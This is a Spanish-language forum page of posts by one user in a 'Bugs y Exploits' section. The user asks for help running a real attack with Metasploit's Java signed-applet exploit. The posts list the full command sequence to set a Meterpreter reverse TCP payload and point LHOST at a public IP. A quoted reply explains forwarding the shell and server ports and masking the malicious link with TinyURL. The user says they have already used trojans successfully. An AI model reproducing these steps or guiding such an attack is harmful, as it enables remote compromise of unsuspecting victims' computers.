Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Socket

#1
Bugs y Exploits / Re: metasploit DUDA ataque real !
17 Septiembre 2013, 15:36 PM
en serio salta el antivurus o no salta ?
#2
Bugs y Exploits / Re: metasploit DUDA ataque real !
14 Septiembre 2013, 23:34 PM
Cita de: xustyx en 14 Septiembre 2013, 19:29 PM
Primero de todo lo que hace es meter un server local, luego si usas router rediriges los puertos de la shell y el server (8080, 4444) a tu ip interna, luego cojes tu ip externa la pasas por tiny url o por dodnde quieras y ya esta, pero dudo que te funcione así por las buenas, mucho firewall y antivirus hay.

Espera por que dices que el firewall y el antivirus ? como en el video si sale bro explicame eso sabes de algun ataque real con reverse shell o payload algo parecido ?
#3
Bugs y Exploits / metasploit DUDA ataque real !
14 Septiembre 2013, 13:58 PM
buenas bros queria saber sobre este bug java_apllets es como un payload que ataka via internet mediante metasploit pero no lo entiendo ???????????

preguntas del video ?

primero abre los puertos 4444 y 8080
por que abre el puerto 8080 ese puerto no es para proxys o para servidores ?

otra cosa la victima tiene que tener instalado JAVA para que funke el ataque ?

y no entiendo para que sirve este website para crear un servidor ?
http://tinyurl.com/create.php
segun el video pone la ip publica .. como LHOST

cuando lo abro en otra maquina sale asi y no me da session a de cuenta que la web no me diera respuesta o
httt://tinyurl.com/194.123.77.33:8080/ me sale asi en la maquina atacada



ya intente con troyanos y me fue bien quiero hacer esto alguien quien me pueda ayudar hacer el ataque por favor

[youtube=640,360]TbeAMnscYtg[/youtube]


pasos del ataque :

use exploit/multi/browser/java_signed_applet

show options

set SRVHOST 192.168.1.9

set URIPATH /

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST 194.123.77.33 IP PUBLICA


exploit
#4
bien hay